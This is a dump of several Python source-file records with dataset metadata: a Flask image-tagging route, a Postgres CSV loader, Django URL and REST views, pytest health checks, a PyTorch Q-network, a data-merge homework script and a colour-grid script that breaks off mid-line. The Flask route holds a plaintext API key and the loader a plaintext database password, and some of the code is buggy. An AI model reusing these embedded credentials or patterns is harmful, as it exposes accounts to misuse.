+{"seq_id": "288030117", "text": "# pylint: disable = line-too-long, inconsistent-return-statements, unused-variable, broad-except, trailing-whitespace, cyclic-import,bare-except, missing-module-docstring, missing-function-docstring, too-many-lines, no-name-in-module, import-error, multiple-imports, pointless-string-statement, too-many-locals, wrong-import-order, anomalous-backslash-in-string,R0912,R0915,W0311\n\n################\n#### routes ####\n################\nimport Algorithmia\nfrom flask import request\nfrom project import mongo, token_required, get_aws_tags\nfrom . import aws_blueprint\n\n# This is your Algorithmia Account API Key\nAPI_KEY = \"sim44RTACPPs2FqnDNPdUflr/em1\"\nclient = Algorithmia.client(API_KEY)\n\n# This will be the algorithm path specified in your published algorithm\nalgo = client.algo('ms4975/image_classifier/1.0.0')\n\ndef predict(image_url):\n\treturn algo.pipe(image_url).result\n\n@aws_blueprint.route('/api/v1/uploadImage/', methods=['POST'])\n@token_required\ndef get_aws_tags_for_image():\n\t# Get fields from request body, check for missing fields\n\tget_image_data = request.get_json()\n\t# Check for nulls and whitespaces\n\ttry:\n\t\tget_int_user_id = int(get_image_data['user_id'])\n\texcept TypeError:\n\t\treturn {'error': 'User id must be numeric'}, 403\n\ttry:\n\t\tget_image_url = get_image_data['profileImg']\n\texcept TypeError:\n\t\treturn {'error': 'Please provide image URL'}, 403\n\n\t# Get collections\n\tprofile = mongo.db.profile\n\taws_tags = mongo.db.aws_tags\n\tuser = mongo.db.user\n\ttry:\n\t\tget_profile_id = int(profile.find().skip(profile.count_documents({}) - 1)[0]['profile_id'])+1\n\texcept ValueError:\n\t\tget_profile_id = 1\n\n\tuser_id_exists = user.count_documents({'user_id': get_int_user_id})\n\tprofile_id_exists = aws_tags.count_documents({'profile_id':get_profile_id })\n\tget_int_profile_id = int(profile_id_exists)\n\tif user_id_exists:\n\t\tget_tags = get_aws_tags(get_image_url)\n\t\turl = get_image_url.split(\".\")\n\t\tif url[3] == \"jpg\":\n\t\t\tget_prediction = predict(get_image_url) # changed to new_predict\n\t\telse:\n\t\t\tget_prediction['Long_Hair'] = { 'Value': False }\n\t\t\tget_prediction['Short_Hair'] = { 'Value': False }\n\t\t\tget_prediction['Indoor'] = { 'Value': False }\n\t\t\tget_prediction['Outdoor'] = { 'Value': False }\n\t\tif get_tags['Code'] == 2:\n\t\t\toutput = {'Code':2 , 'error':'Invalid Image, Please try another image'}\n\t\telif get_int_profile_id == 0:\n\t\t\toutput = {'Code': 1, 'success':get_tags}\n\t\t\taws_tags.insert_one({\n\t\t\t\t'profile_id': get_profile_id,\n\t\t\t\t'user_id': get_int_user_id,\n\t\t\t\t'AgeRange':get_tags['AgeRange'],\n\t\t\t\t'Smile':get_tags['Smile'],\n\t\t\t\t'Eyeglasses':get_tags['Eyeglasses'],\n\t\t\t\t'Sunglasses':get_tags['Sunglasses'],\n\t\t\t\t'Gender':get_tags['Gender'],\n\t\t\t\t'Beard':get_tags['Beard'],\n\t\t\t\t'Mustache':get_tags['Mustache'],\n\t\t\t\t'EyesOpen': get_tags['EyesOpen'],\n\t\t\t\t'MouthOpen': get_tags['MouthOpen'],\n\t\t\t\t'Emotions': get_tags['Emotions'],\n\t\t\t\t'ShortHair': get_prediction['Short_Hair'],\n\t\t\t\t'LongHair': get_prediction['Long_Hair'],\n\t\t\t\t'Indoor': get_prediction['Indoor'],\n\t\t\t\t'Outdoor': get_prediction['Outdoor']\n\t\t\t})\n\t\telse:\n\t\t\toutput = {'Code':3 , 'error':'entry for this profile_id already exists. 
profile_id:-'+ str(get_profile_id)}\n\telse:\n\t\toutput = {'Code':4 , 'error':'user_id does not exists'}\n\treturn output\n", "sub_path": "backend/project/aws/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 3208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "Algorithmia.client", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "project.mongo.db", "line_number": 37, "usage_type": "attribute"}, {"api_name": "project.mongo", "line_number": 37, "usage_type": "name"}, {"api_name": "project.mongo.db", "line_number": 38, "usage_type": "attribute"}, {"api_name": "project.mongo", "line_number": 38, "usage_type": "name"}, {"api_name": "project.mongo.db", "line_number": 39, "usage_type": "attribute"}, {"api_name": "project.mongo", "line_number": 39, "usage_type": "name"}, {"api_name": "project.get_aws_tags", "line_number": 49, "usage_type": "call"}, {"api_name": "project.token_required", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "221979266", "text": "import psycopg2\nimport csv\nimport pandas\nfile = pandas.read_csv('IN.csv')\ndef connection():\n conn = psycopg2.connect(\"dbname='test1' user='postgres' password='KaranS@123' host='localhost' port='5432'\")\n cur = conn.cursor()\n cur.execute(\"CREATE TABLE mapping(key varchar PRIMARY KEY NOT NULL, place_name varchar, admin_name1 varchar, latitude DOUBLE PRECISION, longitude DOUBLE PRECISION, accuracy varchar)\")\n print(\"Records created successfully\")\n return cur,conn\ndef insert(cur,conn,key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy):\n cur.execute(\"INSERT INTO mapping VALUES (%s,%s,%s,%s,%s,%s)\",(key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy))\n conn.commit()\ncur,conn = connection()\nfor key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy in zip(file['key'],file['place_name'],file['admin_name1'],file['latitude'],file[\"longitude\"],file['accuracy']):\n\tprint('inserting ' + key_pk + ' ' + placename_pk + ' ' + str(admin_name1_pk) + ' ' + str(latitude) + ' ' + str(longitude) +' ' + str(accuracy))\n\tif accuracy == 'Nan':\n\t\tinsert(cur,conn,key_pk,placename_pk,admin_name1_pk,latitude,longitude,0)\n\telse:\n\t\tinsert(cur,conn,key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy)\nconn.close()\n", "sub_path": "table_creation.py", "file_name": "table_creation.py", "file_ext": "py", "file_size_in_byte": 1262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "313486791", "text": "\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom apps.Core.index import Index\n\nurlpatterns = [\n url(r'^admin/rq/', include('django_rq_dashboard.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'^SSO/', include('apps.SSO.urls')),\n url(r'^AttendanceSystem/', include('apps.AttendanceSystem.urls')),\n url(r'^DownloadCenter/', include('apps.DownloadCenter.urls')),\n url(r'^Document/', include('apps.Document.urls')),\n url(r'^SupportTicketSystem/', include('apps.SupportTicketSystem.urls')),\n url(r'^BusinessSystem/', include('apps.BusinessSystem.urls')),\n url(r'^Equipment/', include('apps.Equipment.urls')),\n url(r'^IPAddress/', include('apps.IPAddress.urls')),\n url(r'^DayBook/', include('apps.DayBook.urls')),\n url(r'^NotebookPassword/', include('apps.NotebookPassword.urls')),\n url(r'^django-rq/', include('django_rq.urls')),\n url(r'^$', Index.as_view(), name=\"index\"),\n ] \\\n + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) \\\n + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "sub_path": "src/mysite/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, 
{"api_name": "django.conf.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "apps.Core.index.Index.as_view", "line_number": 38, "usage_type": "call"}, {"api_name": "apps.Core.index.Index", "line_number": 38, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 40, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.urls.static.static", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 41, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "594658793", "text": "\nfrom .models import Video\nfrom .serializers import VideModelSerializer\n\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.core.paginator import Paginator\n# Create your views here.\n\n\n\n@api_view(['GET'])\ndef get_videos(request):\n\n videos_data = Video.objects.all().order_by('-published_datetime')\n paginator = Paginator(videos_data, 10)\n page_number = request.GET.get('page', 1) \n videos_data = paginator.get_page(page_number)\n response = [VideModelSerializer(video_data).data for video_data in videos_data]\n return Response(response)\n\n@api_view(['GET'])\ndef search_videos(request):\n search_term = request.GET.get('search_term') or ''\n page_number = request.GET.get('page', 1)\n \n videos_title_data = Video.objects.filter(title__icontains=search_term)\n videos_title_data = set(record for record in videos_title_data)\n videos_description_data = Video.objects.filter(description__icontains=search_term)\n videos_description_data = set(record for record in videos_description_data)\n all_searched_videos_data = [record for record in videos_title_data.union(videos_description_data)]\n paginator = Paginator(all_searched_videos_data, 10)\n all_searched_videos_data = paginator.get_page(page_number)\n response = [VideModelSerializer(video_data).data for video_data in all_searched_videos_data]\n return Response(response)\n", "sub_path": "video_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "models.Video.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 16, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 17, "usage_type": "call"}, {"api_name": "serializers.VideModelSerializer", "line_number": 20, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 21, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Video.objects.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Video.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 33, "usage_type": "call"}, {"api_name": "serializers.VideModelSerializer", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "304293956", "text": "import pytest\nfrom django.urls import reverse\nfrom mock import patch\nfrom rest_framework import status\n\n\nclass TestHealthCheckView:\n @pytest.fixture\n def url(self):\n return reverse('core:health-check')\n\n def test_successful(self, anonymous_client, url):\n response = anonymous_client.get(path=url)\n\n assert response.status_code == status.HTTP_200_OK\n assert response.data == {'detail': 'healthy'}\n\n @patch('django.db.backends.utils.CursorWrapper.__enter__')\n def test_database_response_error(self, mock_cursor, anonymous_client, url):\n mock_cursor.return_value.fetchone.return_value = None\n response = anonymous_client.get(path=url)\n\n assert response.status_code == status.HTTP_500_INTERNAL_SERVER_ERROR\n assert response.data == {'detail': 'Database is not working: Invalid DB response'}\n\n @patch('core.views.cache')\n def test_cache_response_error(self, mock_cache, anonymous_client, url):\n mock_cache.get.return_value = None\n response = anonymous_client.get(path=url)\n\n assert response.status_code == status.HTTP_500_INTERNAL_SERVER_ERROR\n assert response.data == {'detail': 'Cache is not working: Invalid Cache response'}\n", "sub_path": "api/core/tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 1228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.urls.reverse", "line_number": 10, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 23, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "313135282", "text": "\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass QNetwork(nn.Module):\n\n def __init__(self, state_size, action_size):\n super(QNetwork, self).__init__()\n\n self.state_size = state_size\n self.action_size = action_size\n\n self.fc1 = nn.Linear(self.state_size, 64)\n self.d1 = nn.Dropout(p=0.25)\n self.fc2 = nn.Linear(64, 64)\n self.d2 = nn.Dropout(p=0.25)\n self.fc3 = nn.Linear(64, self.action_size)\n\n def forward(self, state):\n\n out = F.relu(self.fc1(state))\n out = self.d1(out)\n out = F.relu(self.fc2(out))\n out = self.d2(out)\n out = self.fc3(out)\n\n return out", "sub_path": "navigation/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 684, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 24, "usage_type": "name"}]}
+{"seq_id": "351411438", "text": "#!/usr/bin/env python\n\nimport sys\nwater = sys.argv[1]\nenergy = sys.argv[2]\nif(len(sys.argv) == 3): #lack one argument for output\n output = sys.stdout #return the output to the STDOUT stream.\nelif(len(sys.argv) == 4): #satisfy the requirement\n output = open(sys.argv[3],\"w\")\nelse:\n print(\"Error! The number of arguments are false!\") #whether the arguments are less than 3 or larger than 4\n\ndef mergy_files(temperature_file, energy_file, output = \"output.csv\"):\n \"\"\"The main function is to read data from two arguments and then mergy\n the data by matching the closest time. At last, print it into a csv.file.\n \"\"\"\n import re\n import time\n import datetime\n\n if output == \"hw2-datamerge/.*.csv\": #prevent overwriting existing files unintentionally.\n print(\"Error! Overwrite existing files!\")\n\n with open(energy_file) as energy:\n energy_date = [] #a list to store the energy_date\n energy_value = [] #a list to store the energy_value\n energy_month = [] #a list to store the energy_month in order to check the order\n energy_day = [] #a list to store the energy_day in order to check the order\n energy_time = [] #a list to store the energy_time in order to check the format\n for line in energy:\n if re.search(r'^(\\d+).*',line):\n date = re.sub(r'^(\\d{4})-(\\d{2})-(\\d{2}).*', r'\\1-\\2-\\3', line) #get the date\n value = re.sub(r'.*(-\\d+),(\\d+)', r'\\2', line) #get the value\n month = re.sub(r'^(\\d{4})-(\\d{2})-(\\d{2}).*', r'\\2', line) #get the month\n day = re.sub(r'^(\\d{4})-(\\d{2})-(\\d{2}).*', r'\\3', line) #get the day\n time = re.sub(r'.* (\\d+:\\d+:\\d+).*(-\\d+).*', r'\\1,\\2', line) #get the time\n energy_date.append(date.rstrip()) #fill the energy_date list\n energy_value.append(value.rstrip()) #fill the energy_value list\n energy_month.append(month.rstrip()) #fill the energy_month list\n energy_day.append(day.rstrip()) #fill the energy_day list\n energy_time.append(time.rstrip()) #fill the energy_time list\n #print(energy_date)\n #print(energy_value)\n\n def check_time(time):\n \"\"\"This part is to check that all dates are at 00:00:00\n (midnight, morning of the given day, Wisconsin time).\n \"\"\"\n for i in range(len(time)):\n if not time[i] == \"00:00:00,-0500\": #check the time format\n print(\"Error! The time is not at midnight, the morning of the given day, Wisconsin time\")\n break\n check_time(energy_time)\n\n def check_order(month, day):\n \"\"\"This part is to check that dates are ordered.\n \"\"\"\n for i in range(len(month)-1):\n if month[i] > month[i+1]:\n print(\"ERROR! Dates are not ordered!\")\n break\n elif month[i] == month[i+1]:\n if day[i] > day[i+1]:\n print(\"ERROR! 
Dates are not ordered!\")\n break\n check_order(energy_month, energy_day)\n\n energy_date_conform = []\n for date in energy_date: #to make the energy_date have the same format as the water_temperature date\n date_conform = datetime.datetime.strptime(date, '%Y-%m-%d').strftime('%m/%d/%y')\n energy_date_conform.append(date_conform)\n\n with open(temperature_file) as water: #deal with the water_temperature file\n water_date = [] #a list to store the water_date\n water_value = [] #a list to store the water_value\n water_index = [] #a list to store the index as the first column of the output file\n for line in water:\n if re.search(r'^(\\d+).*', line):\n date = re.sub(r'\\d+,(.*),.*', r'\\1', line) #get the date\n value = re.sub(r'.*,(\\d+.*)', r'\\1', line) #get the value\n index = re.sub(r'(\\d+),.*', r'\\1', line) #get the index\n water_date.append(date.rstrip()) #fill the water_date list\n water_value.append(value.rstrip()) #fill the water_value list\n water_index.append(index.rstrip()) #fill the index list\n #print(water_date)\n #print(water_value)\n #print(energy_date_conform)\n water_date_conform = []\n for date in water_date: #get the water_date_conform having the same format with energy_date_conform\n newdate = re.sub(r'(\\d+)/(\\d+)/(\\d+)(.*)', r'\\1/\\2/\\3', date)\n water_date_conform.append(newdate)\n #print(water_date_conform)\n\n n_energy = 1 #set the n_energy value\n currentEnergyDay = energy_date_conform[n_energy-1] #set the current currentEnergyDay value\n water_energy_value = [] #a list to store the final value in the output file\n for i in range(len(water_date_conform)-1): #each row in water_temperature file\n if n_energy <= len(energy_date_conform): #i cannot be greater than len(water_date_conform)\n if water_date_conform[i] == currentEnergyDay:\n if water_date_conform[i+1] == currentEnergyDay:\n water_energy_value.append(\" \") #to those not the nearest time\n else:\n water_energy_value.append(str(int(energy_value[n_energy])/1000))\n n_energy += 1\n currentEnergyDay = energy_date_conform[n_energy-1] #those rows to put the value\n water_energy_value.append(\" \") #the last row\n\n #This part is to get the output.csv file\n output.write(\",\".join(['\"#\"','\"Date Time\"','\"Temperature\"','\"Energy Value(kWh)\"'])) #write the column name\n output.write(\"\\n\")\n for i in range(len(water_date_conform)):\n output.write(\",\".join([water_index[i],water_date[i],water_value[i],water_energy_value[i]]))\n output.write(\"\\n\")\n return\n\nif __name__==\"__main__\": #handle in the terminal\n mergy_files(water, energy, output)\n", "sub_path": "hw2/script/hw2_no_comma_last_column.py", "file_name": "hw2_no_comma_last_column.py", "file_ext": "py", "file_size_in_byte": 5912, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.argv", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.sub", 
"line_number": 35, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "time.rstrip", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 78, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 79, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 80, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "61118581", "text": "import argparse\nimport datetime\nimport math\nimport random\nimport textwrap\nimport time\nfrom threading import Timer\n\nfrom modules import badpixels, coloroverlay, colorutils\nfrom PIL import Image, ImageChops, ImageDraw, ImageEnhance, ImageFont, ImageOps\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\n## Image layers\n\n\nclass unit:\n\n\txPos = 0\n\tyPos = 0\n\tbgColor = (0, 0, 0)\n\toutlineColor = (0, 0, 0)\n\ttileSizeWidth = 64\n\ttileSizeHeight = 32\n\tpercentDone = 100.0\n\tresistance = 50.0\n\tscore = 0\n\n\tdef __init__(self):\n\n\t\tself.unHideGrid = False\n\n\tdef createUnitImage(self):\n\t\tself.image = Image.new(\"RGBA\", (self.tileSizeWidth, self.tileSizeHeight))\n\t\tself.draw = ImageDraw.Draw(self.image)\n\n\tdef setUp(self):\n\t\tself.colOverlay = coloroverlay.ColorOverlay()\n\t\tself.colOverlay.randomSteps = True\n\t\tself.colOverlay.steps = self.config.steps\n\t\tself.colOverlay.maxBrightness = self.config.brightness\n\t\tself.colOverlay.tLimitBase = self.config.tLimitBase\n\n\t\t# self.score = 0 if random.random() > .5 else 1\n\n\t\tif self.useFixedPalette == True:\n\n\t\t\tself.colOverlay.minHue = self.palette[0]\n\t\t\tself.colOverlay.maxHue = self.palette[1]\n\t\t\tself.colOverlay.minSaturation = self.palette[2]\n\t\t\tself.colOverlay.maxSaturation = self.palette[3]\n\t\t\tself.colOverlay.minValue = self.palette[4]\n\t\t\tself.colOverlay.maxValue = self.palette[5]\n\t\t\tself.colOverlay.maxBrightness = self.colOverlay.maxValue\n\n\t\t\tself.colOverlay.dropHueMin = self.dropHueMin\n\t\t\tself.colOverlay.dropHueMax = self.dropHueMax\n\n\t\t\tself.colOverlay.colorB = [0, 0, 0]\n\t\t\tself.colOverlay.colorA = [0, 0, 0]\n\t\t\tself.colOverlay.currentColor = [0, 0, 0]\n\t\t\tself.colOverlay.autoChange = False\n\t\t\tself.colOverlay.randomRange = (\n\t\t\t\tself.colorStepsRangeMin,\n\t\t\t\tself.colorStepsRangeMax,\n\t\t\t)\n\n\t\t\tself.colOverlay.colorTransitionSetup()\n\n\tdef getNeighbours(self):\n\t\tN = []\n\t\tpreviousRow = self.row - 1\n\t\tnextRow = self.row + 1\n\t\tpreviousCol = self.col - 1\n\t\tnextCol = self.col + 1\n\n\t\tN.append((previousCol, previousRow))\n\t\tN.append((self.col, previousRow))\n\t\tN.append((nextCol, previousRow))\n\n\t\tN.append((previousCol, self.row))\n\t\tN.append((nextCol, self.row))\n\n\t\tN.append((previousCol, nextRow))\n\t\tN.append((self.col, nextRow))\n\t\tN.append((nextCol, nextRow))\n\n\t\treturn N\n\n\tdef drawUnit(self):\n\n\t\tself.colOverlay.stepTransition()\n\t\tself.bgColor = tuple(\n\t\t\tint(a * config.brightness) for a in (self.colOverlay.currentColor)\n\t\t)\n\n\t\tfontColor = self.bgColor\n\t\tfontColor = (0, 0, 0)\n\t\toutlineColor = self.bgColor\n\n\t\tif self.unHideGrid == True:\n\t\t\tfontColor = config.fontColor\n\t\t\toutlineColor = config.outlineColor\n\n\t\tif self.config.showOutline == False:\n\t\t\toutlineColor = self.bgColor\n\n\t\t\"\"\"\n\t\tif self.colOverlay.gotoNextTransition == True :\n\t\t\tif self.colOverlay.getPercentageDone() > 50 :\n\t\t\t\tif random.random() > .1 :\n\t\t\t\t\tself.colOverlay.colorTransitionSetup()\n\t\t\"\"\"\n\n\t\tself.draw.rectangle(\n\t\t\t(0, 0, self.tileSizeWidth - 1, self.tileSizeHeight - 1),\n\t\t\tfill=self.bgColor,\n\t\t\toutline=outlineColor,\n\t\t)\n\n\t\t# displyInfo = displyInfo.encode('utf-8')\n\t\tif self.config.showText == True:\n\t\t\t# u\"\\u000D\"\n\t\t\tdisplyInfo1 = str(self.col) + \", \" + str(self.row)\n\t\t\tdisplyInfo2 = 
(\n\t\t\t\tstr(self.col * self.tileSizeWidth)\n\t\t\t\t+ \", \"\n\t\t\t\t+ str(self.row * self.tileSizeHeight)\n\t\t\t)\n\t\t\tself.draw.text((2, -1), str(self.unitNumber), fontColor, font=config.font)\n\t\t\t# self.draw.text((2,- 1), (displyInfo1), fontColor, font=config.font)\n\t\t\t# self.draw.text((2,- 1 + config.fontSize), (displyInfo2), fontColor, font=config.font)\n\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\n\n\ndef makeGrid():\n\tglobal config\n\tunitNumber = 1\n\tconfig.unitArray = []\n\tdel config.unitArray[:]\n\tconfig.gridArray = []\n\tconfig.gridArray = [[[] for i in range(config.rows)] for i in range(config.cols)]\n\n\tconfig.t1 = time.time()\n\tconfig.t2 = time.time()\n\tconfig.timeToComplete = round(random.uniform(120, 220))\n\n\tfor row in range(0, config.rows):\n\t\tfor col in range(0, config.cols):\n\t\t\tu = unit()\n\t\t\tu.config = config\n\t\t\tu.tileSizeWidth = config.tileSizeWidth\n\t\t\tu.tileSizeHeight = config.tileSizeHeight\n\t\t\tu.xPos = col * config.tileSizeWidth\n\t\t\tu.yPos = row * config.tileSizeHeight\n\t\t\tu.row = row\n\t\t\tu.col = col\n\t\t\tu.unitNumber = unitNumber\n\t\t\tu.useFixedPalette = config.useFixedPalette\n\t\t\tu.colorStepsRangeMin = config.colorStepsRangeMin\n\t\t\tu.colorStepsRangeMax = config.colorStepsRangeMax\n\n\t\t\tif config.useFixedPalette == True:\n\t\t\t\tif unitNumber <= config.paletteRange:\n\t\t\t\t\tu.palette = config.palette[\"p\" + str(unitNumber)]\n\t\t\t\telse:\n\t\t\t\t\tu.palette = config.palette[\"p\" + str(config.paletteRange)]\n\t\t\t\tu.dropHueMin = 